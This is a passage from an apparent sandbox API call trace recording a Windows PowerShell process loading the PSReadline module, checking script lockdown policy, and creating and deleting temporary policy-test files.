lpOldMode=0x87feb44) returned 1 [0189.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87febc8) returned 1 [0189.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x36 [0189.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x36, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0189.027] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x87fe8f0 | out: lpFindFileData=0x87fe8f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3247d30 [0189.028] FindNextFileW (in: hFindFile=0x3247d30, lpFindFileData=0x87fe8fc | out: lpFindFileData=0x87fe8fc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4631b23a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4631b23a, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.029] FindNextFileW (in: hFindFile=0x3247d30, lpFindFileData=0x87fe8fc | out: lpFindFileData=0x87fe8fc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb5477959, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfff2ff0e, ftLastWriteTime.dwHighDateTime=0x1d1a04a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0189.029] FindNextFileW (in: hFindFile=0x3247d30, lpFindFileData=0x87fe8fc | out: lpFindFileData=0x87fe8fc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb54d73e5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.2", cAlternateFileName="")) returned 1 [0189.030] FindNextFileW (in: hFindFile=0x3247d30, lpFindFileData=0x87fe8fc | out: lpFindFileData=0x87fe8fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0189.030] FindClose (in: hFindFile=0x3247d30 | out: hFindFile=0x3247d30) returned 1 [0189.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87feb84) returned 1 [0189.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87feb90) returned 1 [0189.036] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.036] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0189.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87feb64) returned 1 [0189.036] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x87febe0 | out: lpFileInformation=0x87febe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0189.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87feb60) returned 1 [0189.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0189.043] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fea98) returned 1 [0189.043] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6d4 [0189.043] GetFileType (hFile=0x6d4) returned 0x1 [0189.043] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fea94) returned 1 [0189.043] GetFileType (hFile=0x6d4) returned 0x1 [0189.056] SetFilePointer (in: hFile=0x6d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x87fead4*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x87fead4*=0) returned 0x0 [0189.056] ReadFile (in: hFile=0x6d4, lpBuffer=0x5501b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x87feb00, lpOverlapped=0x0 | out: lpBuffer=0x5501b90*, lpNumberOfBytesRead=0x87feb00*=0x2f6, lpOverlapped=0x0) returned 1 [0189.059] SetFilePointer (in: hFile=0x6d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x87fead4*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x87fead4*=0) returned 0x2f6 [0189.059] ReadFile (in: hFile=0x6d4, lpBuffer=0x5501b90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x87feb00, lpOverlapped=0x0 | out: lpBuffer=0x5501b90*, lpNumberOfBytesRead=0x87feb00*=0x0, lpOverlapped=0x0) returned 1 [0189.062] CloseHandle (hObject=0x6d4) returned 1 [0189.067] EtwEventRegister (in: ProviderId=0x55049b0, EnableCallback=0x5072d7e, CallbackContext=0x0, RegHandle=0x550498c | out: RegHandle=0x550498c) returned 0x0 [0189.068] EtwEventSetInformation (RegHandle=0x75e7608, InformationClass=0x56, EventInformation=0x2, InformationLength=0x5504964) returned 0x0 [0189.233] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1")) returned 0x20 [0189.233] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1")) returned 0x20 [0189.396] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.396] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0189.397] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0189.397] GetSystemDirectoryW (in: lpBuffer=0x31fd1b0, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0189.445] CoTaskMemFree (pv=0x31fd1b0) [0189.446] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0189.446] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0189.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe744) returned 1 [0189.446] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x87fe7c0 | out: lpFileInformation=0x87fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0189.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe740) returned 1 [0189.466] WldpGetLockdownPolicy () returned 0x10000000 [0189.467] CoTaskMemAlloc (cb=0x20c) returned 0x31fd1b0 [0189.467] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x31fd1b0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0189.467] CoTaskMemFree (pv=0x31fd1b0) [0189.468] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0189.468] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x24, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0189.468] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0189.468] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x24, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0189.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe738) returned 1 [0189.468] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp"), fInfoLevelId=0x0, lpFileInformation=0x87fe7b4 | out: lpFileInformation=0x87fe7b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7973e246, ftLastAccessTime.dwHighDateTime=0x1d608b7, ftLastWriteTime.dwLowDateTime=0x7973e246, ftLastWriteTime.dwHighDateTime=0x1d608b7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0189.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe734) returned 1 [0189.473] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0189.473] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", nBufferLength=0x49, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", lpFilePart=0x0) returned 0x48 [0189.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe680) returned 1 [0189.473] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_nwyzpfcp.v3b.ps1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6e4 [0189.477] GetFileType (hFile=0x6e4) returned 0x1 [0189.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe67c) returned 1 [0189.477] GetFileType (hFile=0x6e4) returned 0x1 [0189.479] WriteFile (in: hFile=0x6e4, lpBuffer=0x5511534*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x87fe6fc, lpOverlapped=0x0 | out: lpBuffer=0x5511534*, lpNumberOfBytesWritten=0x87fe6fc*=0x1, lpOverlapped=0x0) returned 1 [0189.480] CloseHandle (hObject=0x6e4) returned 1 [0189.482] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.482] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", lpFilePart=0x0) returned 0x49 [0189.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe680) returned 1 [0189.482] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_zyndrb5o.fdv.psm1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6e4 [0189.482] GetFileType (hFile=0x6e4) returned 0x1 [0189.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe67c) returned 1 [0189.482] GetFileType (hFile=0x6e4) returned 0x1 [0189.482] WriteFile (in: hFile=0x6e4, lpBuffer=0x5513a80*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x87fe6fc, lpOverlapped=0x0 | out: lpBuffer=0x5513a80*, lpNumberOfBytesWritten=0x87fe6fc*=0x1, lpOverlapped=0x0) returned 1 [0189.483] CloseHandle (hObject=0x6e4) returned 1 [0189.485] CoTaskMemAlloc (cb=0x92) returned 0x3254698 [0189.485] IdentifyCodeAuthzLevelW () returned 0x1 [0189.573] CoTaskMemFree (pv=0x3254698) [0189.573] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0189.574] CloseCodeAuthzLevel () returned 0x1 [0189.574] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0189.575] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", nBufferLength=0x49, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", lpFilePart=0x0) returned 0x48 [0189.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe740) returned 1 [0189.575] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_nwyzpfcp.v3b.ps1"), fInfoLevelId=0x0, lpFileInformation=0x87fe7bc | out: lpFileInformation=0x87fe7bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc07adaa1, ftCreationTime.dwHighDateTime=0x1d608b7, ftLastAccessTime.dwLowDateTime=0xc07adaa1, ftLastAccessTime.dwHighDateTime=0x1d608b7, ftLastWriteTime.dwLowDateTime=0xc07adaa1, ftLastWriteTime.dwHighDateTime=0x1d608b7, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0189.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe73c) returned 1 [0189.575] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0189.575] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", nBufferLength=0x49, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1", lpFilePart=0x0) returned 0x48 [0189.575] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nwyzpfcp.v3b.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_nwyzpfcp.v3b.ps1")) returned 1 [0189.577] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.577] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", lpFilePart=0x0) returned 0x49 [0189.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe740) returned 1 [0189.577] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_zyndrb5o.fdv.psm1"), fInfoLevelId=0x0, lpFileInformation=0x87fe7bc | out: lpFileInformation=0x87fe7bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc07adaa1, ftCreationTime.dwHighDateTime=0x1d608b7, ftLastAccessTime.dwLowDateTime=0xc07adaa1, ftLastAccessTime.dwHighDateTime=0x1d608b7, ftLastWriteTime.dwLowDateTime=0xc07adaa1, ftLastWriteTime.dwHighDateTime=0x1d608b7, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0189.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe73c) returned 1 [0189.577] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.577] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1", lpFilePart=0x0) returned 0x49 [0189.577] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_zyndrb5o.fdv.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_zyndrb5o.fdv.psm1")) returned 1 [0189.579] GetSystemInfo (in: lpSystemInfo=0x87fe7f4 | out: lpSystemInfo=0x87fe7f4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0189.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fe784 | out: phkResult=0x87fe784*=0x6e8) returned 0x0 [0189.581] RegQueryValueExW (in: hKey=0x6e8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x87fe7a0, lpData=0x0, lpcbData=0x87fe79c*=0x0 | out: lpType=0x87fe7a0*=0x0, lpData=0x0, lpcbData=0x87fe79c*=0x0) returned 0x2 [0189.581] RegCloseKey (hKey=0x6e8) returned 0x0 [0189.628] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0189.628] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0189.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe6fc) returned 1 [0189.628] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.2\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.2\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6e8 [0189.628] GetFileType (hFile=0x6e8) returned 0x1 [0189.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe6f8) returned 1 [0189.628] GetFileType (hFile=0x6e8) returned 0x1 [0189.629] SetFilePointer (in: hFile=0x6e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x87fe738*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x87fe738*=0) returned 0x0 [0189.629] ReadFile (in: hFile=0x6e8, lpBuffer=0x551627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x87fe764, lpOverlapped=0x0 | out: lpBuffer=0x551627c*, lpNumberOfBytesRead=0x87fe764*=0x2f6, lpOverlapped=0x0) returned 1 [0189.629] SetFilePointer (in: hFile=0x6e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x87fe738*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x87fe738*=0) returned 0x2f6 [0189.629] ReadFile (in: hFile=0x6e8, lpBuffer=0x551627c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x87fe764, lpOverlapped=0x0 | out: lpBuffer=0x551627c*, lpNumberOfBytesRead=0x87fe764*=0x0, lpOverlapped=0x0) returned 1 [0189.629] CoTaskMemAlloc (cb=0x20c) returned 0x31fe1f0 [0189.629] GetSystemDirectoryW (in: lpBuffer=0x31fe1f0, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0189.630] CoTaskMemFree (pv=0x31fe1f0) [0189.630] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0189.630] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0189.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x87fe698) returned 1 [0189.630] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x87fe714 | out: lpFileInformation=0x87fe714*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0189.630] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x87fe694) returned 1 [0189.630] GetSystemInfo (in: lpSystemInfo=0x87fe748 | out: lpSystemInfo=0x87fe748*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0189.631] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x87fe6d8 | out: phkResult=0x87fe6d8*=0x6e4) returned 0x0 [0189.632] RegQueryValueExW (in: hKey=0x6e4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x87fe6f4, lpData=0x0, lpcbData=0x87fe6f0*=0x0 | out: lpType=0x87fe6f4*=0x0, lpData=0x0, lpcbData=0x87fe6f0*=0x0) returned 0x2 [0189.632] RegCloseKey (hKey=0x6e4) returned 0x0 [0189.633] CloseHandle (hObject=0x6e8) returned 1 [0189.698] CoCreateGuid (in: pguid=0x87fe098 | out: pguid=0x87fe098*(Data1=0x1d0de671, Data2=0xd3d7, Data3=0x4b61, Data4=([0]=0x89, [1]=0x4, [2]=0x2a, [3]=0xf, [4]=0xdf, [5]=0xec, [6]=0x77, [7]=0x70))) returned 0x0 [0189.717] CoCreateGuid (in: pguid=0x87fe7c8 | out: pguid=0x87fe7c8*(Data1=0x172fd0b5, Data2=0xe014, Data3=0x49da, Data4=([0]=0xa8, [1]=0x71, [2]=0x96, [3]=0x3, [4]=0x2d, [5]=0x20, [6]=0x85, [7]=0x80))) returned 0x0 [0189.730] QueryPerformanceFrequency (in: lpFrequency=0x3184da0 | out: lpFrequency=0x3184da0*=100000000) returned 1 [0189.730] QueryPerformanceCounter 